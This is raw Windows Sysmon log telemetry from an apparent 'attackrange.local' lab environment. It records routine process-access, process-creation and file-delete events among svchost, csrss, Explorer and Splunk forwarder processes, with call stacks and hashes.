09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-882B-6151-7579-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-882B-6151-7579-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.406{69CF5F33-882B-6151-7579-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976349Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4CF6FC1A1491213E2F263D9BF3F94CC,SHA256=B2019B4CFFF63DCC6ED6AA9191B753551824ECEC4DC8423F537492009A1788BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 